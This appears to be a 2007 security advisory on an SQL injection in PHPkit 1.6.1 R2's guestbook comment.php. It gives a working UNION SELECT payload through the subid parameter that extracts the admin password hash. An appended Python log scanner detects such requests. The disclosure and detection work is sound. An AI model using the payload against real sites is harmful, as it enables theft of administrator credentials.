Pretty much the same, but for completeness... ;-)

SQL Injection in PHPkit 1.6.1 R2
================================

Discovered on 09.01.2007 by yorn.

Description:
------------
http://www.phpkit.de/
PHPkit is a PHP/SQL-based portal software.

Problem:
--------
SQL Injection:
There are multiple SQL injections in PHPkit. Just check bugtraq.
I think that this is a "new" one, so here we go:

The "Gästebuch" (guestbook) is prone to an SQL injection vulnerability in comment.php.
It is possible to gain access to the admin password hash:

POC:
comment.php&comcat=gb&subid=-1'%20UNION%20SELECT%201,1,1,1,1,1,user_pw,1%20from%20PHPKIT_USER_TABLE%20where%20%20user_id=1/*

Vendor Status:
--------------
Vendor has been informed on the date of discovery.
Not patched yet.
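
While no patch is available, requests that abuse the subid parameter can be picked out of web server access logs. The following is an added example, not part of the original advisory and not PHPkit code; it assumes a legitimate subid is always a non-negative integer, and the log lines and the /portal/?path= URL prefix are constructed.

```python
import re
from urllib.parse import unquote_plus

# subid may follow '?' or '&'; the advisory's PoC writes
# "comment.php&comcat=gb&subid=...", so both delimiters are accepted.
SUBID_RE = re.compile(r"(?:^|[?&;])subid=([^&;\s]*)", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded quotes (%2527) surface."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_request(target):
    """Return decoded subid values of a comment.php request that are not
    plain non-negative integers (assumption: valid ids are digits only)."""
    if "comment.php" not in target.lower():
        return []
    values = (decode_fully(raw) for raw in SUBID_RE.findall(target))
    return [v for v in values if not re.fullmatch(r"\d+", v)]

def scan_log(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((number, v) for v in check_request(match.group(1)))
    return hits

# Constructed sample lines; the URL prefix is hypothetical.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jan/2007:10:00:00 +0100] "GET /portal/?path=comment.php&comcat=gb&subid=12 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [09/Jan/2007:10:00:05 +0100] "GET /portal/?path=comment.php&comcat=gb&subid=-1%27%20UNION%20SELECT%201 HTTP/1.1" 200 4801',
    '192.0.2.77 - - [09/Jan/2007:10:00:09 +0100] "GET /portal/?path=comment.php&comcat=gb&subid=3%2527 HTTP/1.1" 200 4790',
    '192.0.2.10 - - [09/Jan/2007:10:00:12 +0100] "GET /portal/index.php?subid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, value in scan_log(SAMPLE_LOG):
        print(f"line {number}: non-numeric subid {value!r}")
```

The same digits-only rule is what the server side should enforce on subid before the value reaches a query.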